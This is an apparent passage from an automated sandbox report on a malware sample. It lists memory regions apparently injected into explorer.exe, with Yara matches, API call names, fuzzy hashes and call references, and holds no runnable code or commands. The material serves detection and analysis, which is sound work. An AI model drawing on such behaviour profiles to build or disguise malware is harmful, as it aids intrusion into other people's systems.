                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2680336364.0000000008220000.00000040.00000001.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_8220000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd
                                                                                                                                                                                                                        • String ID: MOC$RCC$csm
                                                                                                                                                                                                                        • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                        • Opcode ID: c2495fac8a8ee9703a56ee76ee72a8311d39d807a6431aeb043a6da8ae743678
                                                                                                                                                                                                                        • Instruction ID: 54ec7f6e6730d54ecb092a6c70aad0e91bd150e3e5f09bc5e448fe25d22e7d26
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2495fac8a8ee9703a56ee76ee72a8311d39d807a6431aeb043a6da8ae743678
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C2E06D38131006CEC72D7B6481083A436A0FF58207F5662A5CD498B222D7BC14C28ABB
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692587166.000000000E080000.00000040.00000400.00020000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e080000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd
                                                                                                                                                                                                                        • String ID: MOC$RCC$csm
                                                                                                                                                                                                                        • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                        • Opcode ID: c2495fac8a8ee9703a56ee76ee72a8311d39d807a6431aeb043a6da8ae743678
                                                                                                                                                                                                                        • Instruction ID: 5e2348aa170b0d80cfac9288b1caebf4b1f1f3cdd538952d647cdcf464c4c38e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2495fac8a8ee9703a56ee76ee72a8311d39d807a6431aeb043a6da8ae743678
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F5E0C23D51011DCED7697BE486593A832E0EB69216F8E4AF1CB648B221D7FC4CC58A53
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd
                                                                                                                                                                                                                        • String ID: MOC$RCC$csm
                                                                                                                                                                                                                        • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                        • Opcode ID: c2495fac8a8ee9703a56ee76ee72a8311d39d807a6431aeb043a6da8ae743678
                                                                                                                                                                                                                        • Instruction ID: 9169f89687ad1d34fbab05cd67e56773dae6e53fc4a72c6111d06e7b8b07d529
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2495fac8a8ee9703a56ee76ee72a8311d39d807a6431aeb043a6da8ae743678
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B0E06D36904206C6C7253FAC86143BC3260F78CB16F86F06A87004B300C7BDE9A48A1A
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd
                                                                                                                                                                                                                        • String ID: MOC$RCC$csm
                                                                                                                                                                                                                        • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                        • Opcode ID: c2495fac8a8ee9703a56ee76ee72a8311d39d807a6431aeb043a6da8ae743678
                                                                                                                                                                                                                        • Instruction ID: 86cfe8556af3ad73f17f410c99fd7080284e15f30e7204162b0ba0a2118faac8
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2495fac8a8ee9703a56ee76ee72a8311d39d807a6431aeb043a6da8ae743678
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DDE0ED36610274CAC729ABA48C443AC36E0E7DC706F969879876647310C7BD8DE4CB56
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd
                                                                                                                                                                                                                        • String ID: MOC$RCC$csm
                                                                                                                                                                                                                        • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                        • Opcode ID: c2495fac8a8ee9703a56ee76ee72a8311d39d807a6431aeb043a6da8ae743678
                                                                                                                                                                                                                        • Instruction ID: f6eaca4a3c3c4bb08f5c59e2ba02fa9798adbbefebec15451db8275a53ff3182
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2495fac8a8ee9703a56ee76ee72a8311d39d807a6431aeb043a6da8ae743678
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 27E0ED3A900344EACB25BFA48C043EC3660EB9CB06FEA95A2865447343CFBD55848B5A
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: isdigit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2326231117-0
                                                                                                                                                                                                                        • Opcode ID: 575487ceb0303e27247f880880b4ca3aa31c271d3c830e399248b04aa83da87b
                                                                                                                                                                                                                        • Instruction ID: 780178405b681d24f968c773cb7c05070db7a4fea0704bec9cc0c454d701698c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 575487ceb0303e27247f880880b4ca3aa31c271d3c830e399248b04aa83da87b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5A21F9E1E546525EEB30DB5DEC5133E23D8AB00FA6F04C42FD54A82920DFECC1989A50
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: isdigit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2326231117-0
APIs
Memory Dump Source
• Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
• Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
Yara matches
Similarity
• API ID: isdigit
• String ID:
• API String ID: 2326231117-0
APIs
Memory Dump Source
• Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
• Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
Yara matches
Similarity
• API ID: AllocCurrentHeap$CloseHandleNextProcessThreadThread32
• String ID:
• API String ID: 3234909527-0
APIs
Memory Dump Source
• Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
• Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
Yara matches
Similarity
• API ID: AllocCurrentHeap$CloseHandleNextProcessThreadThread32
• String ID:
• API String ID: 3234909527-0
APIs
Memory Dump Source
• Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
• Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
Yara matches
Similarity
• API ID: lstrcatlstrlen$lstrcpymalloc
• String ID:
• API String ID: 3932841890-0
APIs
Memory Dump Source
• Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
• Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
Yara matches
Similarity
• API ID: lstrcatlstrlen$lstrcpymalloc
• String ID:
• API String ID: 3932841890-0
APIs
Memory Dump Source
• Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
• Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
Yara matches
Similarity
• API ID: lstrcatlstrlen$lstrcpymalloc
• String ID:
• API String ID: 3932841890-0
APIs
Memory Dump Source
• Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
• Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
Yara matches
Similarity
• API ID: Pointerabort$DecodeEncode_set_abort_behavior
• String ID:
• API String ID: 2556904055-0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Pointerabort$DecodeEncode_set_abort_behavior
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2556904055-0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Pointerabort$DecodeEncode_set_abort_behavior
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2556904055-0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: %08lX%04lX%lu$:
                                                                                                                                                                                                                        • API String ID: 3001812590-1109288774
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: %08lX%04lX%lu$:
                                                                                                                                                                                                                        • API String ID: 3001812590-1109288774
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: %08lX%04lX%lu$:\
                                                                                                                                                                                                                        • API String ID: 3001812590-790759568
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: %08lX%04lX%lu$:\
                                                                                                                                                                                                                        • API String ID: 3001812590-790759568
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0DFAE4F9
                                                                                                                                                                                                                          • Part of subcall function 0DFBC800: _lock.LIBCMT ref: 0DFBC812
                                                                                                                                                                                                                          • Part of subcall function 0DFAFCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0DFAFCF6
                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0DFAE55E
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0DFAE58C
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0DFAE59D
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID: bad cast
                                                                                                                                                                                                                        • API String ID: 1776536810-3145022300
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0DFAE429
                                                                                                                                                                                                                          • Part of subcall function 0DFBC800: _lock.LIBCMT ref: 0DFBC812
                                                                                                                                                                                                                          • Part of subcall function 0DFAFCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0DFAFCF6
                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0DFAE48E
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0DFAE4BC
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0DFAE4CD
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID: bad cast
                                                                                                                                                                                                                        • API String ID: 1776536810-3145022300
                                                                                                                                                                                                                        • Opcode ID: e12aab8860acf557d2b04f3f24e138c6e46a913c51b90a53e675e9d96cf3b24c
                                                                                                                                                                                                                        • Instruction ID: 7d506710f3b79cc6a632fc3949d0c113a8f99c63f7a8c2e45f30963ebd805025
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e12aab8860acf557d2b04f3f24e138c6e46a913c51b90a53e675e9d96cf3b24c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6E116365708B8291DE10DB5BE8503AEB361B789BE4F49C2229E6D077A8DF7CC545C740
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0E10E429
                                                                                                                                                                                                                          • Part of subcall function 0E11C800: _lock.LIBCMT ref: 0E11C812
                                                                                                                                                                                                                          • Part of subcall function 0E10FCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0E10FCF6
                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0E10E48E
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0E10E4BC
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0E10E4CD
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID: bad cast
                                                                                                                                                                                                                        • API String ID: 1776536810-3145022300
                                                                                                                                                                                                                        • Opcode ID: e12aab8860acf557d2b04f3f24e138c6e46a913c51b90a53e675e9d96cf3b24c
                                                                                                                                                                                                                        • Instruction ID: ae33b1f3503cf005af293d55d8f4daf9c737354fcfb4998d922bb0869c345cd2
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e12aab8860acf557d2b04f3f24e138c6e46a913c51b90a53e675e9d96cf3b24c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 45114272304B8191DE14DB16F45039AA3A1F788BE4F884A319E6D57BE8DFBCC986C740
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0E10E4F9
                                                                                                                                                                                                                          • Part of subcall function 0E11C800: _lock.LIBCMT ref: 0E11C812
                                                                                                                                                                                                                          • Part of subcall function 0E10FCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0E10FCF6
                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0E10E55E
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0E10E58C
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0E10E59D
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID: bad cast
                                                                                                                                                                                                                        • API String ID: 1776536810-3145022300
                                                                                                                                                                                                                        • Opcode ID: f1300f81eb57dd33d0072446336b583a13e2806e1f87491055f06ab309a88068
                                                                                                                                                                                                                        • Instruction ID: 572fed35013eb0145a005a3e9b984f6ed7f7cd5e4d48e7c521816cfc70f39722
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f1300f81eb57dd33d0072446336b583a13e2806e1f87491055f06ab309a88068
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9B118276304B8091DE14DB26F45039AA3A1B788BE4F884A21D96D07BE8EF78C9C6C740
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0FF4E4F9
                                                                                                                                                                                                                          • Part of subcall function 0FF5C800: _lock.LIBCMT ref: 0FF5C812
                                                                                                                                                                                                                          • Part of subcall function 0FF4FCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0FF4FCF6
                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0FF4E55E
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0FF4E58C
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0FF4E59D
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID: bad cast
                                                                                                                                                                                                                        • API String ID: 1776536810-3145022300
                                                                                                                                                                                                                        • Opcode ID: f1300f81eb57dd33d0072446336b583a13e2806e1f87491055f06ab309a88068
                                                                                                                                                                                                                        • Instruction ID: b3c2a2f4324ef1c14d4909247a91534648fdb78dc0f07bd4e35b54ecbe383643
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f1300f81eb57dd33d0072446336b583a13e2806e1f87491055f06ab309a88068
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59114222604B4681DE10DB26E850379B761BB88FE4F884231DE6D47BA9EF7CD146C740
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0FF4E429
                                                                                                                                                                                                                          • Part of subcall function 0FF5C800: _lock.LIBCMT ref: 0FF5C812
                                                                                                                                                                                                                          • Part of subcall function 0FF4FCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0FF4FCF6
                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0FF4E48E
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0FF4E4BC
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0FF4E4CD
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
